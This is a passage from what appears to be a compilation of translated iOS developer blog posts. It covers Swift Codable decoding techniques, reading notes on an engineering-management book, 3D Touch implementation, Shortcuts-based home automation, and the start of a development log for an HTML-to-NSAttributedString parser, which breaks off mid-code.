Use decodeIfPresent to decode the field that may be missing.
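A minimal sketch, assuming a SongEntity variant whose name may be missing; decodeIfPresent returns nil instead of throwing when the key is absent:

import Foundation

struct SongEntity: Decodable {
    enum CodingKeys: String, CodingKey {
        case type
        case id
        case name
    }

    var type: String
    var id: Int
    var name: String? // may be absent in the JSON

    init(from decoder: Decoder) throws {
        let container = try decoder.container(keyedBy: CodingKeys.self)
        self.type = try container.decode(String.self, forKey: .type)
        self.id = try container.decode(Int.self, forKey: .id)
        self.name = try container.decodeIfPresent(String.self, forKey: .name)
    }
}

let jsonString = "[{\"type\":\"song\",\"id\":99,\"name\":\"Thinking of You Under the Stars\"},{\"type\":\"song\",\"id\":11}]"
let songs = try JSONDecoder().decode([SongEntity].self, from: jsonString.data(using: .utf8)!)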
{
+ "results": [
+ {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars"
+ },
+ {
+ "error": "error"
+ },
+ {
+ "type": "song",
+ "id": 19,
+ "name": "Take Me to Find Nightlife"
+ }
+ ]
+}
+
As mentioned earlier, Decodable by default requires all data to parse correctly before it produces any output. Sometimes the backend returns unstable data: a long array where some entries are missing fields or have mismatched types and fail to decode. A single failing entry then causes the whole decode to fail and return nothing.
struct ResultsEntity: Decodable {
+ enum CodingKeys: String, CodingKey {
+ case results
+ }
+ var results: [SongEntity]
+
+ init(from decoder: Decoder) throws {
+ let container = try decoder.container(keyedBy: CodingKeys.self)
+ var nestedUnkeyedContainer = try container.nestedUnkeyedContainer(forKey: .results)
+
+ self.results = []
+ while !nestedUnkeyedContainer.isAtEnd {
+ if let song = try? nestedUnkeyedContainer.decode(SongEntity.self) {
+ self.results.append(song)
+ } else {
+ let _ = try nestedUnkeyedContainer.decode(EmptyEntity.self)
+ }
+ }
+ }
+}
+
+struct EmptyEntity: Decodable { }
+
+struct SongEntity: Decodable {
+ var type: String
+ var id: Int
+ var name: String
+}
+
+let jsonString = "{ \"results\": [ { \"type\": \"song\", \"id\": 99, \"name\": \"Thinking of You Under the Stars\" }, { \"error\": \"error\" }, { \"type\": \"song\", \"id\": 19, \"name\": \"Take Me to Find Nightlife\" } ] }"
+let jsonDecoder = JSONDecoder()
+let result = try jsonDecoder.decode(ResultsEntity.self, from: jsonString.data(using: .utf8)!)
+print(result)
+
The solution is similar to the one for Scenario 2: nestedUnkeyedContainer iterates through each element and performs a try? decode. If the decode fails, we decode an EmptyEntity instead so that nestedUnkeyedContainer's internal pointer can keep advancing.
*This method is somewhat of a workaround: we cannot tell nestedUnkeyedContainer to skip an element, and it only advances after a successful decode, so we decode a placeholder instead. Some in the Swift community have suggested adding moveNext(), but it has not been implemented in the current version.
Here we should revisit what was said at the beginning about the value of splitting Entity/Model: the Entity is solely responsible for mapping the JSON string to an Entity (Decodable), while the Model is initialized from the Entity; everything the program actually passes around, operates on, and applies business logic to is the Model.
struct SongEntity: Decodable {
+ var type: String
+ var id: Int
+ var name: String
+}
+
+class SongModel: NSObject {
+ init(_ entity: SongEntity) {
+ self.type = entity.type
+ self.id = entity.id
+ self.name = entity.name
+ }
+
+ var type: String
+ var id: Int
+ var name: String
+
+ var isSave:Bool = false //business logic
+}
+
Benefits of splitting Entity/Model: the Entity stays a faithful mirror of the JSON, while internal-use state and business logic live on the Model.
The alternative is to keep a single type: list CodingKeys that exclude the internal-use fields and give those fields default values (during init or at declaration), or make them Optional. These approaches run, but they are workarounds rather than good designs.
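For comparison, a minimal sketch of that single-type workaround (isSaved is an illustrative internal-use field): a property omitted from CodingKeys must have a default value or be Optional, otherwise the synthesized Decodable will not compile.

struct SongEntity: Decodable {
    var id: Int
    var name: String

    // Internal-use field: not listed in CodingKeys, so it needs a default value (or must be Optional)
    var isSaved: Bool = false

    enum CodingKeys: String, CodingKey {
        case id
        case name
    }
}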
A complete example combining the basic and advanced usage mentioned above:
{
+ "count": 5,
+ "offset": 0,
+ "limit": 10,
+ "results": [
+ {
+ "id": 123456,
+ "comment": "It's Accusefive, not Fiveaccuse!",
+ "target_object": {
+ "type": "song",
+ "id": 99,
+ "name": "Thinking of You Under the Stars",
+ "create_date": "2020-06-13T15:21:42+0800"
+ },
+ "commenter": {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli",
+ "email": "zhgchgli@gmail.com",
+ "birthday": "1994/07/18"
+ }
+ },
+ {
+ "error": "not found"
+ },
+ {
+ "error": "not found"
+ },
+ {
+ "id": 2,
+ "comment": "Haha, me too!",
+ "target_object": {
+ "type": "user",
+ "id": 1,
+ "name": "zhgchgli",
+ "email": "zhgchgli@gmail.com",
+ "birthday": "1994/07/18"
+ },
+ "commenter": {
+ "type": "user",
+ "id": 1,
+ "name": "Passerby A",
+ "email": "man@gmail.com",
+ "birthday": "2000/01/12"
+ }
+ }
+ ]
+}
+
Output:
zhgchgli: It's Accusefive, not Five Accuse!
+
Complete example demonstration as above!
The main benefit of choosing Codable is that it is native: you don't have to worry about it becoming unmaintained, and the call sites read nicely. The trade-off is that it is stricter and less flexible when parsing JSON strings, so you have to do the extra work described in this article, and its performance is not actually better than other mapping libraries (Decodable still uses NSJSONSerialization from the Objective-C era for parsing). However, Apple may well optimize this in future updates, and then we won't need to change our code.
The scenarios and examples in this article may be extreme, but sometimes you simply run into them. Of course, we hope that in most situations plain Codable meets our needs; with the techniques above, though, there should be no unsolvable problems!
Thanks to @saiday for technical support.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
“Leading Snowflakes The Engineering Manager Handbook” — Oren Ellenbogen
Entering a management position for the first time can be very confusing. My knowledge about management had been gathered only from previous work experience, observation, and casual chats with colleagues about which of a supervisor's actions subordinates viewed positively or negatively. These experiences and thoughts were fragmented and unsystematic, so I started reading books and recording each author's experience; if I run into similar situations, having this "knowledge confidence" will keep me from being flustered.
The author, with nearly 20 years of work experience, transitioned from a software engineer to a management position step by step; having served as a Technical Lead and Engineering Manager in both large companies and startups. This book details the bottlenecks encountered when transitioning from an engineer to a management position and the methods to organize and solve them.
I find my background very similar, having originally worked in software development and now exploring management. The key points mentioned in the book have taught me many methods on how to proceed!
- This article is merely personal notes mixed with some personal views. In this age of fragmented information, it is strongly recommended to read the original book to systematically absorb the essence.
- The significance of notes is to make it easier to quickly locate the points you want to review later.
- Some content is directly excerpted from the original text.
The transition from Engineer (Maker) to Manager.
Completing tasks well, and even solving problems elegantly, is the measure of an excellent engineer. As a manager, however, you are no longer measured by your ability to complete tasks (you have already proven that) but by how well you lead the team, drive it forward, and grow its capabilities.
However, one cannot completely detach from tasks, as completely detaching from task details can lead to disconnection from team members, posing significant risks in terms of execution results, priorities, and trust in the long run.
So, it is not that as a manager you don’t need to do engineering tasks, but rather you need to balance between being an Engineer (Maker) and a Manager.
As engineers, we like to have uninterrupted time to stay in context and solve difficult problems; but as managers, we need to frequently step out to help the team and care for teammates, so interruptions are actually part of a manager’s job.
The author suggests creating two calendars, one as a Maker (engineer) and one as a Manager, and then spending 15-30 minutes every morning to organize thoughts and plan the day’s schedule, including what tasks to do, what meetings to attend, and identifying continuous time slots to solve tasks (as a Maker).
Author’s Calendar Template
The author states that even as managers, we still need to handle tasks; the available focused time is more important to us than before.
The author mentions that during focused time, you can convey to teammates not to disturb you through certain actions!
Methods include: going to a meeting room, wearing headphones, or even buying an ON AIR! switch light to place on your desk.
If it is not an urgent issue, teammates can leave a message or compile information and email it to you, to be addressed after the focused time ends.
Because I can no longer fully dedicate myself to development tasks as I did when I was purely an engineer (Maker), I need to choose tasks that I can personally execute based on the time available in the engineer’s schedule.
Do not become the technical bottleneck of the team. Our mission is to enhance team capabilities, explore new technologies, and improve the company’s technical vision both internally and externally. Tasks can include pre-researching technical issues and sharing them with teammates for execution, resolving the company’s technical debt, improving processes to increase development efficiency, using new technologies, open-sourcing company technology, opening APIs, participating in external hackathons, etc.
The author suggests starting with a 15-20% ratio. Originally, it was 100% as Maker, but now it might be 20% as Maker / 80% as Manager (though this depends on the actual team size and member capabilities; the author also mentions that 50% / 50% is possible). The key is not to be 100% invested in engineering development but to spend more effort on management.
Regularly have 1:1 meetings with teammates to provide mutual feedback and share what you’ve learned.
The author finally mentions that if your management tasks are so overwhelming that you can’t do any engineering (as Maker) work and become disconnected from tasks and technology, you might consider working from home (WFH) a few days a week to isolate yourself from the company or participate in hackathons.
Regularly review the decisions you make as a manager.
As engineers, we have many methods or tools that, if followed, can improve our abilities, such as pair programming, code review, and design patterns. But as managers, especially new ones, we often feel quite lonely.
We don’t want to admit our ignorance to our superiors or subordinates, fear being responsible for the team’s success, and worry about balancing technical debt and business needs.
The author mentions stepping out to seek ways to improve management skills, openly soliciting feedback, and enhancing management skills; being a manager can be as passionate as being an engineer.
Colleagues and bosses are powerful resources we often underestimate. We can quickly learn from their feedback. Establishing a habit of recording and reviewing decisions can help us get better feedback.
The author mentions:
“There is no one right way, there are only tradeoffs.”
I agree. If it weren't a dilemma, they probably wouldn't ask; if they do ask, it means the teammates don't know how to decide.
We can list options and provide decisions to teammates, but at the same time, we should also note the decisions made.
Sample record sheet provided by the author
Develop the habit of recording and ensure the content is memorable for later.
The author suggests reviewing monthly, sharing and discussing decisions with your boss, other managers, or colleagues (at least half of the issues), and listening to others’ opinions. You can anonymize to protect individuals, focus on issues, not people, and record them.
Regarding the problem:
Regarding the decision:
Encourage teammates to step out of their comfort zones and avoid becoming a jerk or falling into traps.
The author mentions initially feeling uncomfortable because colleagues who were friends now became subordinates. He feared damaging the original relationship, so he took on all the finishing tasks himself. But eventually, he found that the more he protected, the more distant he became from teammates because he kept working hard alone, sharing less, and causing teammates to lose faith.
Looking back, the author says it’s better to express your true thoughts rather than fear hurting teammates’ feelings. “Fear of hurting teammates” is simply a selfish imagination, unnecessary. Moreover, it’s the manager’s responsibility to lead the team to grow and move forward, to see the big picture, and control risks.
Sharing true thoughts is difficult for both sides, but it’s the manager’s responsibility.
We need to show empathy, not sympathy. To make their work truly outstanding, they need our objective opinions.
The author provides the following three points to help balance emotions and behavior:
“If you want to achieve anything in this world, you have to get used to the idea that not everyone will like you.”
If you want to achieve something, you must get used to the fact that not everyone will like your ideas.
Four common pitfalls:
Summary
Spend time writing down ways to motivate teammates and ask supervisors if they are being too protective of the team.
How to complete tasks with lower risk.
Leading by example is a good method. Occasionally participate in the team’s development to demonstrate how to plan and produce good features, showcasing the principles we want to convey. Additionally, focus on explaining the “Why?” (Why do it this way) more than the “How?” (How to do it).
The author mentions a culture of extreme transparency, allowing team members to have complete context, which can enhance decision-making capabilities.
Reducing risk
Delegate tasks while maintaining quality and visibility.
As a manager, you must delegate tasks properly. The author believes that delegation should involve setting expectations and trusting that the assigned teammates have the ability to execute, learn, and have room for mistakes. Managers should also protect teammates from company pressure.
The author uses the following table for recording:
This mainly records tasks that are important to team goals, not daily work.
When deciding whether to delegate a task to a teammate, the author first asks if the task is something only they can do and if it is a managerial task. The second question is whether the task is a long-term leadership task. If neither, then delegate it to a teammate.
For tasks to be delegated, evaluate the teammate’s experience and skills to find the right person.
For the delegation part, we can provide a one-page paper explaining our expectations and simple examples.
Collaboration and mutual understanding between teams.
The author explains that organizations split into many small teams for quick decision-making to accomplish more. Defining the direction of each team is not difficult (e.g., iOS team works on the iOS app), but aligning all teams’ goals is challenging.
The more teams there are, the harder it is to unify everyone’s values, expectations, priorities, and implicit expectations.
We should focus on the reasons and motivations for splitting teams rather than the output, as this can lead to contradictions.
The author believes the following methods can align the direction of each team:
Additionally, here are 5 ways to help teammates build close relationships with other teams:
Summary
“Imagine that someone from Team A drops a feature that Team B needs, due to an urgent support issue. Without communicating this priority change to Team B, trust will be decreased even if it’s a justified priority change.”
“difference between transactional trust and relational/emotional trust”
Build a culture of business learning rather than a culture of building, optimizing throughput, or optimizing value.
Use the AARRR principle for value optimization: Acquisition, Activation, Retention, Referral, Revenue.
These five aspects are closely related. If Retention is low, adjustments can be made to Referral and Acquisition at the same time.
As engineering managers, our job is not just to code or fully immerse ourselves in technology; we should periodically realign with product value.
When the product is in its early market testing phase, focus on optimizing efficiency (quickly solving tasks and releasing) by repeating the following process:
Feature improves Retention -> Release feature -> Learn -> Adjust & repeat.
Evaluate each stage from feature to release for optimization opportunities (spending too much time on design? Discussions?).
Can we invest 20% of the time to reduce 80% of development time? Especially painful points.
Can we experiment or release to the smallest audience first? Avoid large features that end up unused.
“If you can’t make engineering decisions based on data, then make engineering decisions that result in data.”
Although “not implementing this feature will bankrupt the company” is scarier than “this feature will lead to technical debt,” as managers, if we can secure more time to address technical debt, we should do so. We must communicate and manage well.
Optimizing code that might not be used is meaningless.
Track team output (e.g., “01/01/2013–14/01/2013: 2 Large features, 5 Medium features, 4 Small”), and through long-term statistics, provide forecasts.
Identify & resolve bottlenecks:
Since business strategies are constantly changing, we should maintain a more open and flexible mindset towards optimization strategies, with the summary of optimization still focusing on business needs.
About Recruitment.
Start doing the following tasks regularly to prevent a sudden shortage of talent. If you wait until you need people, you’ll have to revert to traditional methods of constant interviewing, which makes it hard to find suitable candidates.
Internal:
External:
Assign the above tasks to team members so everyone contributes to finding good talent.
Building a scalable team.
Creating scalable programs has been our responsibility as engineers, but now the challenge is to build a scalable team.
Unlike programs, people have expectations, needs, and dreams to consider.
The author wants to create a happy work environment where teammates understand task expectations and new challenges, and maintain this enthusiasm.
Define team vision For example, the author’s team is doing web scraping, and their team vision is “To build the largest, most informative profile-database in the world.” Note that this is a vision, not a short-term goal or something you don’t want to do.
Define team core values When selecting core values, ask, “Is this value important enough to fire someone over if they lack it?” Write down the core values and reasons. The author provides the following core values:
Basic expectations:
Personal expectations:
We are a team. Team members have their responsibilities and deliverables, and they must also collaborate with others, help each other, and grow together. Defining expectations is like a contract, transforming the original colleague relationship into a managerial relationship, leading more purposefully. Defining these items is not easy and requires time and patience to iterate.
“You can’t empower people by approving their actions. You empower by designing the need for your approval out of the system.”
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
iOS 3D TOUCH Application
3D Touch functionality has been removed in iPhone 11 and later versions; it has been replaced by Haptic Touch, which is implemented differently.
Some time ago, during a break in project development, I explored many interesting iOS features: CoreML, Vision, Notification Service Extension, Notification Content Extension, Today Extension, Core Spotlight, Share Extension, SiriKit (some have been organized into articles, others are coming soon 🤣)
Among them is today’s main feature: 3D Touch
This feature, supported since iOS 9 and the iPhone 6s, only became useful to me after I upgraded from an iPhone 6 to an iPhone 8!
The first feature is the most widely used and effective (Facebook: content preview in news feed, Line: sneak peek at messages), while the second feature, APP Shortcut Launch, is less commonly used based on data, so it will be discussed last.
As shown in the first image above, the ViewController preview function supports:
Here, we will list the code to implement in A: List View and B: Target View separately:
Since there is no way to determine whether the current view is a preview or an actual entry in B, we first create a Protocol to pass values for judgment:
protocol UIViewControllerPreviewable {
+ var is3DTouchPreview: Bool { get set }
+}
+
This way, we can make the following judgments in B:
class BViewController: UIViewController, UIViewControllerPreviewable {
+ var is3DTouchPreview: Bool = false
+ override func viewDidLoad() {
+ super.viewDidLoad()
+ if is3DTouchPreview {
+ // If it is a preview window... for example: show full screen, hide the toolbar
+ } else {
+ // Display normally in full mode
+ }
+ }
+}
+
A: List window, can be UITableView or UICollectionView:
class AViewController:UIViewController {
+ // Register the View that can 3D Touch
+ override func traitCollectionDidChange(_ previousTraitCollection: UITraitCollection?) {
+ super.traitCollectionDidChange(previousTraitCollection)
+ if traitCollection.forceTouchCapability == .available {
+ // TableView:
+ registerForPreviewing(with: self, sourceView: self.TableView)
+ // CollectionView:
+ registerForPreviewing(with: self, sourceView: self.CollectionView)
+ }
+ }
+}
+extension AViewController: UIViewControllerPreviewingDelegate {
+ // Handling after 3D Touch is released
+ func previewingContext(_ previewingContext: UIViewControllerPreviewing, commit viewControllerToCommit: UIViewController) {
+
+ // Now we need to navigate to the page directly, so cancel the preview mode parameter of the ViewController:
+ if var viewControllerToCommit = viewControllerToCommit as? UIViewControllerPreviewable {
+ viewControllerToCommit.is3DTouchPreview = false
+ }
+ self.navigationController?.pushViewController(viewControllerToCommit, animated: true)
+ }
+
+ // Control the position of the 3D Touch Cell, the ViewController to be displayed
+ func previewingContext(_ previewingContext: UIViewControllerPreviewing, viewControllerForLocation location: CGPoint) -> UIViewController? {
+
+ // Get the current indexPath/cell entity
+ // TableView:
+ guard let indexPath = TableView.indexPathForRow(at: location), let cell = TableView.cellForRow(at: indexPath) else { return nil }
+ // CollectionView:
+ guard let indexPath = CollectionView.indexPathForItem(at: location), let cell = CollectionView.cellForItem(at: indexPath) else { return nil }
+
+ // The ViewController to be displayed
+ let targetViewController = UIStoryboard(name: "StoryboardName", bundle: nil).instantiateViewController(withIdentifier: "ViewControllerIdentifier")
+
+ // Retain area when background is blurred (usually the click location), see Figure 1
+ previewingContext.sourceRect = cell.frame
+
+ // 3D Touch window size, default is adaptive, no need to change
+ // To modify, use: targetViewController.preferredContentSize = CGSize(width: 0.0, height: 0.0)
+
+ // Inform the previewing ViewController that it is currently in preview mode:
+ if var targetViewController = targetViewController as? UIViewControllerPreviewable {
+ targetViewController.is3DTouchPreview = true
+ }
+
+ // Return the view controller to preview (returning nil would show no preview)
+ return targetViewController
+ }
+}
+
Note! The registration of the 3D Touch View should be placed in traitCollectionDidChange instead of “viewDidLoad” ( refer to this content )
I encountered many issues regarding where to place it. Some sources on the internet suggest viewDidLoad, while others suggest cellForItem. However, both places may occasionally fail or cause some cells to malfunction.
Figure 1 Background Blur Reserved Area Diagram
If you need to add an options menu after swiping up, please add it in B. It’s B, B, B!
override var previewActionItems: [UIPreviewActionItem] {
+ let profileAction = UIPreviewAction(title: "View Merchant Info", style: .default) { (action, viewController) -> Void in
+ // Action after clicking
+ }
+ return [profileAction]
+}
+
Returning an empty array indicates that this feature is not used.
Done!
Add the UIApplicationShortcutItems parameter in info.plist, type Array
And add menu items (Dictionary) within it, with the following Key-Value settings:
Referenced from this article
My settings as shown above
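If you prefer to configure the shortcuts in code instead of info.plist, the same items can also be set dynamically. A minimal sketch (the type string matches one handled in the AppDelegate below; the title and icon here are illustrative):

import UIKit

// A sketch of the equivalent dynamic configuration.
let searchShopItem = UIApplicationShortcutItem(
    type: "searchShop",
    localizedTitle: "Search Shops",
    localizedSubtitle: nil,
    icon: UIApplicationShortcutIcon(type: .search),
    userInfo: nil
)
UIApplication.shared.shortcutItems = [searchShopItem]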
Add the handling function in AppDelegate
func application(_ application: UIApplication, performActionFor shortcutItem: UIApplicationShortcutItem, completionHandler: @escaping (Bool) -> Void) {
+ let info = shortcutItem.userInfo // extra data attached to the shortcut item, if any
+
+ switch shortcutItem.type {
+ case "searchShop":
+ break // handle the "searchShop" shortcut here
+ case "topicList":
+ break // handle the "topicList" shortcut here
+ case "likeWorksPic":
+ break // handle the "likeWorksPic" shortcut here
+ case "marrybarList":
+ break // handle the "marrybarList" shortcut here
+ default:
+ break
+ }
+ completionHandler(true)
+}
+
Done!
Adding 3D Touch functionality to an app is not difficult, and users will find it very considerate ❤; it can be combined with design to enhance the user experience. However, currently only the two functions mentioned above can be implemented, and since the iPhone 6 and earlier, iPads, and the iPhone XR do not support 3D Touch, what you can actually do with it is even more limited; it mainly serves as an aid to enhance the experience.
If you test carefully enough, you will notice the above effect. When part of the image in the CollectionView has already slid out of the screen, pressing it will result in the above situation 😅
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Automate operations directly using the built-in Shortcuts app on iOS ≥ 13.1
In early July this year, I bought two smart devices: the Mi Home Desk Lamp Pro and the Mi Home LED Smart Desk Lamp. The difference is that one supports HomeKit, and the other only supports Mi Home. At that time, I wrote an article titled “First Experience with Smart Home — Apple HomeKit & Xiaomi Mi Home” which mentioned how to achieve smart functions for leaving and arriving home without HomePod/AppleTV/iPad. The steps were a bit complicated.
This time, on iOS ≥ 13.1 (note that it is only available from 13.1 onward), the built-in "Shortcuts" app (if you can't find it, download it from the App Store) supports automation. Used together with IFTTT or Mi Home smart devices, there is no longer any need to rely on additional third-party apps!
You will receive a shortcut execution notification when entering or leaving the set area, and it will automatically execute upon clicking.
Switch to “My” -> “Smart”
Here, it is assumed that you have already added the device to Mi Home.
Select “Manual Execution”
Here, let me mention why not directly use Mi Home’s “Leave or Arrive at a Place”. First, GPS used in mainland China has deviations which Xiaomi has not corrected. Second, it can only set locations with landmarks on the map, and there are few Taiwan landmarks on the mainland Gaode map.
Scroll down to the “Smart Devices” section, add the devices and actions to be operated
Click “Continue to Add” to add all the devices to be operated
For example, in the “Leave Home” mode, I want to turn off the fan and lights and turn on the camera when leaving home.
Click the top right “Save” and enter the name of this smart operation
Return to the list, click “Add to Siri”
Click “Add to Siri” next to the smart operation you want to add
Input “Command when calling Siri” -> “Add to Siri”
Note! The command must not conflict with built-in iOS commands!
Switch to the “Automation” tab and click the “+” in the upper right corner
If there is no “Automation” tab, please check if your iOS version is higher than 13.1.
Select “Create Personal Automation”
Choose the type “Arrive” or “Leave”
Set “Location”
Search for a location or use the current location, click “Done”
You can set the time range for automatic execution at the bottom, click “Next” in the upper right corner
Since leaving home and arriving home are events that need to be detected all day long, we won’t set a time range for execution here!
Click “Add Action”
Select “Scripting”
Scroll to the “Shortcuts” section, select “Run Shortcut”
Click the “Shortcut” section
Find the “Command when calling Siri” set in Mi Home “Add to Siri”, and select it
Click “Done” in the upper right corner
The newly added automation will appear on the home page!
Done!
When leaving or entering the set address range, the phone or Apple Watch will receive a notification to execute the shortcut, and you can click to execute!
1. There is a 100-meter error in the GPS sensing range
2. The so-called "automation" is just an automatic notification prompting you to tap and execute; it does not actually run the actions in the background
Execution notification
Click to “Execute”
Please note that it will require unlocking the phone first.
Execution failure will also provide feedback!
Sometimes Mi Home device network issues will cause execution failure.
Click to execute
Compared with the IFTTT app, the strength of the native approach is that the notification can be executed directly from the watch (IFTTT only sends a notification; you still have to take out your phone to execute it).
Using Siri to Execute
Since the Mi Home smart operation scenario has been added to Siri, you can also call Siri to perform actions!
One step closer to a smart life!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
The development log of ZMarkupParser HTML to NSAttributedString rendering engine
Tokenization conversion of HTML String, Normalization processing, generation of Abstract Syntax Tree, application of Visitor Pattern / Builder Pattern, and some miscellaneous discussions…
Last year, I published an article titled “[ TL;DR ] Implementing iOS NSAttributedString HTML Render”, which briefly introduced how to use XMLParser to parse HTML and then convert it into NSAttributedString.Key. The structure and thought process in the article were quite disorganized, as it was a quick record of the issues encountered previously and I did not spend much time researching the topic.
Revisiting this topic, we need to be able to convert the HTML string provided by the API into NSAttributedString and apply the corresponding styles to display it in UITextView/UILabel.
e.g. <b>Test<a>Link</a></b>
should be displayed as Test Link
It is strongly recommended to use Markdown as the string rendering medium language. If your project has the same dilemma as mine and you have no elegant tool to convert HTML to NSAttributedString, please use it.
Friends who remember the previous article can directly jump to the ZhgChgLi / ZMarkupParser section.
The methods for HTML to NSAttributedString found online all suggest directly using NSAttributedString’s built-in options to render HTML, as shown in the example below:
let htmlString = "<b>Test<a>Link</a></b>"
+let data = htmlString.data(using: String.Encoding.utf8)!
+let attributedOptions:[NSAttributedString.DocumentReadingOptionKey: Any] = [
+ .documentType :NSAttributedString.DocumentType.html,
+ .characterEncoding: String.Encoding.utf8.rawValue
+]
+let attributedString = try! NSAttributedString(data: data, options: attributedOptions, documentAttributes: nil)
+
The problems with this approach:
- Plain text that merely looks like a tag, e.g. <Congratulation!>, will be treated as an HTML tag and removed.
- Crashes and poor performance, described below.
The most painful issue for us is the crash problem. From the release of iOS 15 until the fix in 15.2, our app was plagued by it. Between 2022/03/11 and 2022/06/08 it caused over 2.4K crashes, affecting more than 1.4K users.
This crash issue has existed since iOS 12, and iOS 15 just made it worse. I guess the fix in iOS 15.2 is just a patch, and the official solution cannot completely eradicate it.
The second issue is performance. As a string style Markup Language, it is heavily used in the app’s UILabel/UITextView. As mentioned earlier, one label takes 0.03 seconds, and multiplying this by the number of UILabel/UITextView in a list will cause noticeable lag in user interactions.
The second solution is introduced in the previous article, which uses XMLParser to parse into corresponding NSAttributedString keys and apply styles.
Refer to the implementation of SwiftRichString and the content of the previous article.
The previous article only explored using XMLParser to parse HTML and perform corresponding conversions, completing an experimental implementation, but it did not design it as a well-structured and extensible “tool.”
The problem with this approach: three perfectly possible HTML inputs, <br> (a tag with no closing tag), <Congratulation!> (plain text that looks like a tag), and <b>Bold<i>Bold+Italic</b>Italic</i> (misplaced tags), will cause XMLParser to throw an error and render nothing.
Neither of the above two solutions can perfectly and elegantly solve the HTML problem, so I started searching for existing solutions.
After searching extensively, I found that the results are similar to the projects mentioned above. There are no giants’ shoulders to stand on.
Without the shoulders of giants, I had to become a giant myself, so I developed an HTML String to NSAttributedString tool.
Developed purely in Swift, it parses HTML Tags using Regex and performs Tokenization, analyzing and correcting Tag accuracy (fixing tags without an end & misplaced tags), then converts it into an abstract syntax tree. Finally, using the Visitor Pattern, it maps HTML Tags to abstract styles to get the final NSAttributedString result; it does not rely on any Parser Lib.
NSAttributedString.DocumentType.html
style="color:red..."
For detailed introduction, installation, and usage, refer to this article: ZMarkupParser HTML String to NSAttributedString Tool
You can directly git clone the project, open ZMarkupParser.xcworkspace, select the ZMarkupParser-Demo target, and Build & Run it to try it out.
Now, let’s dive into the technical details of developing this tool.
Overview of the operation process
The above image shows the general operation process, and the following article will introduce it step by step with code examples.
⚠️ This article will simplify Demo Code as much as possible, reduce abstraction and performance considerations, and focus on explaining the operation principles; for the final result, please refer to the project Source Code.
a.k.a parser, parsing
When it comes to HTML rendering, the most important part is parsing. In the past, HTML was parsed as XML using XMLParser; however, it couldn’t handle the fact that HTML usage is not 100% XML, causing parser errors and inability to dynamically correct them.
After ruling out the use of XMLParser, the only option left in Swift was to use Regex for matching and parsing.
Initially, the idea was to use Regex to extract “paired” HTML Tags and recursively find HTML Tags layer by layer until the end; however, this couldn’t solve the problem of nested HTML Tags or support for misplaced tags. Therefore, we changed the strategy to extract “single” HTML Tags, recording whether they are Start Tags, Close Tags, or Self-Closing Tags, and combining other strings into a parsed result array.
Tokenization structure is as follows:
enum HTMLParsedResult {
+ case start(StartItem) // <a>
+ case close(CloseItem) // </a>
+ case selfClosing(SelfClosingItem) // <br/>
+ case rawString(NSAttributedString)
+}
+
+extension HTMLParsedResult {
+ class SelfClosingItem {
+ let tagName: String
+ let tagAttributedString: NSAttributedString
+ let attributes: [String: String]?
+
+ init(tagName: String, tagAttributedString: NSAttributedString, attributes: [String : String]?) {
+ self.tagName = tagName
+ self.tagAttributedString = tagAttributedString
+ self.attributes = attributes
+ }
+ }
+
+ class StartItem {
+ let tagName: String
+ let tagAttributedString: NSAttributedString
+ let attributes: [String: String]?
+
+ // Start Tag may be an abnormal HTML Tag or normal text e.g. <Congratulation!>, if found to be an isolated Start Tag after subsequent Normalization, it will be marked as True.
+ var isIsolated: Bool = false
+
+ init(tagName: String, tagAttributedString: NSAttributedString, attributes: [String : String]?) {
+ self.tagName = tagName
+ self.tagAttributedString = tagAttributedString
+ self.attributes = attributes
+ }
+
+ // Used for automatic padding correction in subsequent Normalization
+ func convertToCloseParsedItem() -> CloseItem {
+ return CloseItem(tagName: self.tagName)
+ }
+
+ // Used for automatic padding correction in subsequent Normalization
+ func convertToSelfClosingParsedItem() -> SelfClosingItem {
+ return SelfClosingItem(tagName: self.tagName, tagAttributedString: self.tagAttributedString, attributes: self.attributes)
+ }
+ }
+
+ class CloseItem {
+ let tagName: String
+ init(tagName: String) {
+ self.tagName = tagName
+ }
+ }
+}
+
The regex used is as follows:
<(?:(?<closeTag>\/)?(?<tagName>[A-Za-z0-9]+)(?<tagAttributes>(?:\s*(\w+)\s*=\s*(["|']).*?\5)*)\s*(?<selfClosingTag>\/)?>)
+
The named capture groups work as follows:
- closeTag: the leading "/" of a closing tag, e.g. </a>
- tagName: the tag name itself, e.g. a
- tagAttributes: the attribute string, e.g. href="https://zhgchg.li" style="color:red"
- selfClosingTag: the trailing "/" of a self-closing tag, e.g. <br/>
*This regex can still be optimized; I will do that later.
Additional information about regex is provided in the latter part of the article, interested friends can refer to it.
Combining it all together:
var tokenizationResult: [HTMLParsedResult] = []
+
+let expression = try! NSRegularExpression(pattern: pattern, options: expressionOptions) // force try is acceptable here since the pattern is a fixed literal
+let attributedString = NSAttributedString(string: "<a>Li<b>nk</a>Bold</b>")
+let totalLength = attributedString.string.utf16.count // utf-16 support emoji
+var lastMatch: NSTextCheckingResult?
+
+// Start Tags Stack, First In Last Out (FILO)
+// Check if the HTML string needs subsequent normalization to correct misalignment or add self-closing tags
+var stackStartItems: [HTMLParsedResult.StartItem] = []
+var needFormatter: Bool = false
+
+expression.enumerateMatches(in: attributedString.string, range: NSMakeRange(0, totalLength)) { match, _, _ in
+ if let match = match {
+ // Check the string between tags or before the first tag
+ // e.g. Test<a>Link</a>zzz<b>bold</b>Test2 - > Test,zzz
+ let lastMatchEnd = lastMatch?.range.upperBound ?? 0
+ let currentMatchStart = match.range.lowerBound
+ if currentMatchStart > lastMatchEnd {
+ let rawStringBetweenTag = attributedString.attributedSubstring(from: NSMakeRange(lastMatchEnd, (currentMatchStart - lastMatchEnd)))
+ tokenizationResult.append(.rawString(rawStringBetweenTag))
+ }
+
+ // <a href="https://zhgchg.li">, </a>
+ let matchAttributedString = attributedString.attributedSubstring(from: match.range)
+
+ // Helper: safely take a named capture group as a substring (a group that did not participate has location NSNotFound)
+ func substring(named name: String) -> NSAttributedString? {
+ let range = match.range(withName: name)
+ guard range.location != NSNotFound else { return nil }
+ return attributedString.attributedSubstring(from: range)
+ }
+
+ // a, a
+ let matchTag = substring(named: "tagName")?.string.trimmingCharacters(in: .whitespacesAndNewlines).lowercased()
+ // false, true
